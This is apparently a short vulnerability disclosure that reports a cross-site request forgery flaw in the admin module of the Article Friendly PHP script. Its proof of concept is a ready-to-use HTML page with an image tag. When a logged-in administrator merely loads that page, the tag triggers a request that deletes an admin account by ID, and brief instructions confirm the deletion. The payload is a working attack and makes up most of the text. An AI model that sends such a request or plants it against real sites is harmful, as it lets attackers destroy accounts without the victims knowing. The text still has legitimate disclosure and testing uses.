54 lines
No EOL
1.4 KiB
Text
54 lines
No EOL
1.4 KiB
Text
=======================================================================
|
|
|
|
Article friendly CSRF Vulnerability
|
|
|
|
=======================================================================
|
|
|
|
by
|
|
|
|
Pratul Agrawal
|
|
|
|
|
|
|
|
# Vulnerability found in- Admin module
|
|
|
|
# email Pratulag@yahoo.com
|
|
|
|
# company aksitservices
|
|
|
|
# Credit by Pratul Agrawal
|
|
|
|
# Site p4ge http://www.articlefriendly.com/
|
|
|
|
# Plateform php
|
|
|
|
|
|
|
|
# Proof of concept #
|
|
|
|
Targeted URL: http://server/admin/index.php?filename=adminlogin
|
|
|
|
|
|
Script to delete the Admin user through Cross Site request forgery
|
|
|
|
. ..................................................................................................................
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<img src=http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
. ..................................................................................................................
|
|
|
|
|
|
|
|
After execution refresh the page and u can see that user having giving ID get deleted automatically.
|
|
|
|
|
|
#If you have any questions, comments, or concerns, feel free to contact me. |